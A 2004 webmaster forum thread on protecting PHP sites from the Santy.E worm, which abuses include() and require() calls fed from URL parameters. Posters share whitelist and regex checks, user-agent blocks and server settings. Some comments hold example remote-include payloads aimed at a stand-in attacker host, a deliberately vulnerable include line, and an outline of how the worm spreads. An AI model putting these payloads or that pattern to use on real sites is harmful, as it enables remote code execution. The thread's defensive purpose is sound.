"Santy.E worm poses threat to sites badly coded in PHP" is the headline of an article posted at computerworld.com.
If anyone has seen this article and has any hints on how to determine the level of risk for a particular site, it would be great to hear them. I have a few sites running that use require() and include(). The story says:
Santy.C and Santy.E behave so differently from Santy.A that K-OTik is renaming the worm PhpInclude.Worm in its advisories, the company said yesterday. The worm doesn't exploit the vulnerabilities in phpBB targeted by its predecessor, instead aiming for a wider range of common programming errors in PHP Web pages. It uses search engines including Google, Yahoo and AOL to identify exploitable Web pages written in PHP that use the functions "include()" and "require()" in an insecure manner, K-OTik said.
For example, I could have an include specified in the URL as index.php?include=biglist and then implicitly add the .php when including.
Other sites I manage would never include anything from outside the _include directory.
Make sure your sites won't include any old thing, and that they never include anything from external servers, and you should be pretty much safe, at least from Santy.E.
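A minimal sketch of what I mean (the _include directory and the page names here are just examples, adjust for your own setup):
<?php
// Only ever include pages from a fixed list you control,
// never the raw value taken from the URL.
$pages = array("biglist", "contact", "news");
$page = isset($_GET['include']) ? $_GET['include'] : "biglist";
if (in_array($page, $pages)) {
    include "_include/" . $page . ".php";
} else {
    include "_include/biglist.php"; // fall back to a known-safe default
}
?>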
By the way, Santy.E has always identified its user agent as either LWP::Simple/[version number] or lwp-trivial, so I added this at the top of the index.php file that is used to display all content on most of my sites:
<?php
// Bail out early when the User-Agent matches the worm's known agents
// (LWP::Simple/x.xx or lwp-trivial); eregi() matches case-insensitively.
$ua = getenv("HTTP_USER_AGENT");
if (eregi("LWP::Simple", $ua) or eregi("lwp-trivial", $ua)) {
    print(0);
    exit;
}
?>
Stops them cold it does.
Small edit to the PHP code.
It's been all over my site. To no avail, I'm happy to say. I often use includes, but I've made sure never to include exactly what's entered via the URL, as Santy hopes.
Where did you see evidence of its visit? I have only a limited knowledge of PHP.
I think that we are fairly safe concerning include() based on your post, but what about require()?
Thanks for the help.
# Refuse (403) any request whose User-Agent starts with LWP or lwp
RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} ^LWP [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp
RewriteRule .* - [F]
You can put that in your Apache httpd.conf file instead. Note that mod_rewrite has to be enabled in either case.
Or you can use this in an .htaccess file:
# Tag any request whose User-Agent contains "lwp" (the match is
# case-insensitive and unanchored), then refuse those requests.
SetEnvIfNoCase User-Agent "lwp" spambot=1
<Limit GET POST PUT>
Order allow,deny
allow from all
deny from env=spambot
</Limit>
I used the rewrite.
Also, make sure all your php, htm, html and asp pages are chmod 644 (which they should be already).
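If you want to double-check those permissions from PHP itself, a rough sketch like this will report anything that isn't 644 (the extensions and the current-directory assumption are mine; GLOB_BRACE may not be available on every platform):
<?php
// List files in the current directory whose permissions are not 644.
$files = glob("*.{php,htm,html}", GLOB_BRACE);
if ($files) {
    foreach ($files as $file) {
        $mode = substr(sprintf('%o', fileperms($file)), -3);
        if ($mode != "644") {
            echo "$file is $mode, expected 644\n";
        }
    }
}
?>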
How do you know if they're 'attacking' your site? Simply look at your httpd log file. Wherever you see a user agent with lwp or LWP, you're seeing the worm making HTTP calls.
When I first noticed this late on 25th December my site was getting over 10 calls a minute. I checked this morning (the 28th) and it was as bad as it was on the 25th.
require() will be open to the same vulnerabilities as include(). From what I read here, it looks like this Santy thing is basically an automated version of what script kiddies do manually. If you use 'normal' good-security PHP coding practices and scripts - like always checking variables used in dynamic includes (and checking them properly) - you won't be vulnerable.
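To make that concrete, here is a rough before/after sketch (the parameter name 'page' and the allowed list are just examples):
<?php
// DANGEROUS: includes whatever the visitor puts in the URL, e.g.
//   index.php?page=http://attacker.example.com/payload
// require($_GET['page'] . ".php");

// Safer: check the variable against a list you control first.
$allowed = array("home", "about", "links");
if (isset($_GET['page']) && in_array($_GET['page'], $allowed)) {
    require $_GET['page'] . ".php";
} else {
    require "home.php";
}
?>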
Good programming is part of the issue, but there's more to it than that.
What I do know is that I have definitely seen two different 'worms', or whatever, attacking my site, and I've seen well over 10 requests a minute at times. I believe they are different worms because the requests are so different. The 'short' requests made it easy to understand what was happening.
The longer requests appear to be using session hashes, so it might not be a buffer overflow attempt. As I said, I'm not an expert. But my point is, the 'worm' (or whatever) is being changed frequently, with at least 4 variants identified so far (I believe I saw that on InfoWorld's site).
My site is relatively tight so I've had no problems, but the propagation technique is such that I personally would not assume the worms are all going to stick with attempts to exploit PHP includes and requires. The next one may be looking for, or doing, something else.
That's why I felt it was important to block the worm's HTTP requests entirely, as opposed to simply 'tightening up' PHP coding. Almost everything I read is about making sure PHP scripts are properly written. I see little about ensuring files are set with the correct permissions (644) AND blocking the HTTP calls from the worms.
Another aspect of blocking the worm's requests is that if one doesn't, a heck of a lot of bandwidth will be used and server resources (load) will be tied up. Depending on your server, either one of these could be problematic. I have a dedicated server that I chose by estimating even heavy loads (my site is relatively small) and buying 10x that capacity. In my case, even with all the calls from the worms before I blocked them, I had no problems. However, I have communicated with a number of people with limited server packages (many on shared hosting) where a good part of their bandwidth allotment was eaten up and/or their server had become very 'sluggish'.
As an added comment, even though I have mod_rewrite sending requests with lwp and/or LWP in the user agent to 'nowhereland', the number of worms 'hitting' my site has not gone down since they started on 25 December - going on 4 days now.
[edited by: coopster at 1:38 pm (utc) on Dec. 29, 2004]
[edit reason] removed url per TOS [webmasterworld.com] [/edit]
If I'm passing variables in my query string like "?p=somepage89" and it loads a file called somepage89.ext, and the ext isn't php, is that OK or not?
I have a site that has a lot of sections that call a template to load the content for each section differently, as each section requires different formatting. I used includes in this fashion to call them.
Is there a better way if it's wrong?
I don't really want to build 50+ switches into each page.
You can use file_get_contents() to go grab external web pages, or cURL.
A thing like this will start off with a search engine, looking randomly for URLs that are obviously in PHP and are most likely to use unprotected dynamic includes. It will then go to that URL and try requesting the page with the parameter name it thinks is exploitable, and with the URL of a remote page containing some sample code as the parameter value - a parameter passed inside this URL basically tells it what code to generate. It'll check whether the requested page looks like it included that code, and if it did, it will start doing things like trying to read different directories. It will test these directories to see if they are writable, preferably trying to find one inside the webroot. Then it will write itself to this directory and call itself in the mode where it starts off again searching for vulnerable URLs, doing the whole thing over.
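In other words, the hole it is probing for looks something like this (the parameter and host names are made up for illustration):
<?php
// Vulnerable pattern: the include path comes straight from the query
// string. A request like
//   index.php?template=http://attacker.example.com/payload.txt?
// makes PHP fetch and run the remote file - the appended ".php" just
// ends up in the remote URL's query string, so it changes nothing.
include($_GET['template'] . ".php");
?>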
Sypher_5: it doesn't matter what extension the file you include or require has; PHP will begin parsing it as PHP if it finds the opening PHP tag. A big switch table would be one means of security; a better means is a naming convention, so you know that the only files a dynamic include will permit are ones that fit a certain name pattern. In your case, you could do something like this to check:
if (preg_match('#^somepage[0-9]*\.ext$#', $_GET['p'])) include $_GET['p'];
This way you know that the string $_GET['p'] begins with "somepage", is followed (optionally) by some digits, then ".ext", and ends there, with nothing else allowed (i.e., it doesn't have 'http://' at the beginning, or 'ftp://', or anything else that could pull in a remote file - and it doesn't have double dots and a slash, which would mean it's traversing your directory tree). If you use pregs, make sure you have the caret ^ and dollar sign $ at the beginning and end of the expression, in the right places; otherwise the pattern will match any string that merely contains this portion, instead of requiring that it makes up the whole string.
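A quick illustration of why the anchors matter (the hostile string is made up):
<?php
$evil = "http://evil.example.com/somepage1.ext";

// Unanchored: matches, because the pattern occurs *somewhere* in the string.
var_dump(preg_match('#somepage[0-9]*\.ext#', $evil));   // int(1)

// Anchored: fails, because the whole string has to be the pattern.
var_dump(preg_match('#^somepage[0-9]*\.ext$#', $evil)); // int(0)
?>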
For coders who aren't yet comfortable with regexes, you can pass only a portion of the file name and use the function ctype_alnum() [be.php.net] to check that string, making sure it's just letters and numbers, and then add your own directory and extension information (and whatever else you want) with string concatenation. This way you're also sure that what you're including comes from your particular directory, that the name has only letters and numbers in it, and that it has the extension you indicate.
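Something along these lines - the directory and extension here are assumptions, substitute your own:
<?php
// Accept only letters and digits, then build the full path yourself.
$page = isset($_GET['p']) ? $_GET['p'] : "";
if ($page != "" && ctype_alnum($page)) {
    include "/home/mysite/_include/" . $page . ".ext";
} else {
    include "/home/mysite/_include/default.ext"; // known-safe default
}
?>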
Another thing you can do is ask your host to turn off fopen URL wrappers, which will prevent all remote includes - though this will also prevent you from grabbing off-site files, like XML feeds.
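(On most servers that's the allow_url_fopen setting in php.ini. A one-liner like this shows how yours is configured:)
<?php
// Reports whether fopen-style functions - and, on PHP of this vintage,
// include/require as well - will open http:// and ftp:// URLs.
echo ini_get('allow_url_fopen') ? "allow_url_fopen is ON" : "allow_url_fopen is OFF";
?>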
Checking referrers or user agents may well work at this point, but don't forget that the next round of similar critters will probably forge these. Blocking the HTTP requests will save you bandwidth now, but won't help so much later.
mods, if you're uncomfortable with anything here, I quite understand.